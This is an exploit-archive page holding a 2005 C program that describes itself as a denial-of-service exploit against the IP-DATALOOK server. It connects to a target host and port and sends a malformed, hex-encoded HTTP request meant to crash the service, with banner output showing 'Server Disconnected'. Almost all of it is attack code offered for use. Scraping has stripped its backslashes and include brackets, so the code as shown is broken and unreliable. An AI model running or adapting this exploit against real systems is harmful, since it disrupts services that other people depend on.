https://www.exploit-db.com/exploits/1067

漏洞细节尚未披露

/*

 IP-DATALOOK Local DoS Exploit
---------------------------------
INFGP - Hacking&security Research

Resolve host...[OK]
 [+] Connecting...[OK]
Target locked
Sending bad procedure...[OK]
 [*] Server Disconnected!

 Tested on Windows2000 SP4
 Infos: infamous.2hell.com / [email protected]

*/

#include string.h
#include winsock2.h
#include stdio.h

#pragma comment(lib, "ws2_32.lib")

char doscore[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"x3fx3fx3fx3fx3fx2ex48x54x4dx4cx3fx74x65x73x74x76"
"x61x72x69x61x62x6cx65x3dx26x6ex65x78x74x74x65x73"
"x74x76x61x72x69x61x62x6cx65x3dx67x69x66x20x48x54"
"x54x50x2fx31x2ex31x0ax52x65x66x65x72x65x72x3ax20"
"x68x74x74x70x3ax2fx2fx6cx6fx63x61x6cx68x6fx73x74"
"x2fx62x6fx62x0ax43x6fx6ex74x65x6ex74x2dx54x79x70"
"x65x3ax20x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78"
"x2dx77x77x77x2dx66x6fx72x6dx2dx75x72x6cx65x6ex63"
"x6fx64x65x64x0ax43x6fx6ex6ex65x63x74x69x6fx6ex3a"
"x20x4bx65x65x70x2dx41x6cx69x76x65x0ax43x6fx6fx6b"
"x69x65x3ax20x56x41x52x49x41x42x4cx45x3dx53x45x43"
"x55x52x49x54x59x2dx50x52x4fx54x4fx43x4fx4cx53x3b"
"x20x70x61x74x68x3dx2fx0ax55x73x65x72x2dx41x67x65"
"x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex37x36"
"x20x5bx65x6ex5dx20x28x58x31x31x3bx20x55x3bx20x4c"
"x69x6ex75x78x20x32x2ex34x2ex32x2dx32x20x69x36x38"
"x36x29x0ax56x61x72x69x61x62x6cx65x3ax20x72x65x73"
"x75x6cx74x0ax48x6fx73x74x3ax20x6cx6fx63x61x6cx68"
"x6fx73x74x0ax43x6fx6ex74x65x6ex74x2dx6cx65x6ex67"
"x74x68x3ax20x20x20x20x20x35x31x33x0ax41x63x63x65"
"x70x74x3ax20x69x6dx61x67x65x2fx67x69x66x2cx20x69"
"x6dx61x67x65x2fx78x2dx78x62x69x74x6dx61x70x2cx20"
"x69x6dx61x67x65x2fx6ax70x65x67x2cx20x69x6dx61x67"
"x65x2fx70x6ax70x65x67x2cx20x69x6dx61x67x65x2fx70"
"x6ex67x0ax41x63x63x65x70x74x2dx45x6ex63x6fx64x69"
"x6ex67x3ax20x67x7ax69x70x0ax41x63x63x65x70x74x2d"
"x4cx61x6ex67x75x61x67x65x3ax20x65x6ex0ax41x63x63"
"x65x70x74x2dx43x68x61x72x73x65x74x3ax20x69x73x6f"
"x2dx38x38x35x39x2dx31x2cx2ax2cx75x74x66x2dx38x0a"
"x0ax0ax77x68x61x74x79x6fx75x74x79x70x65x64x3dx41"
"x69x6dx61x67x65rn";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf(" n", argv[0]);
printf("       IP-DATALOOK Local DoS Exploit n", argv[0]);
printf("  -------------------------------------n", argv[0]);
printf("    INFGP - Hacking&Security Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]);
printf("[?]Exam: localhost 80n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR n");
exit(1);
}

printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED n", argv[0]);
exit(1);
}
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILEDn");
exit(1);
}
printf("[OK]n");
printf("Target lockedn");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERRORn");
closesocket(inetdos);
exit(1);
}
printf("[OK]n ");
printf("[+] Server Disconnected!n");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-06-25]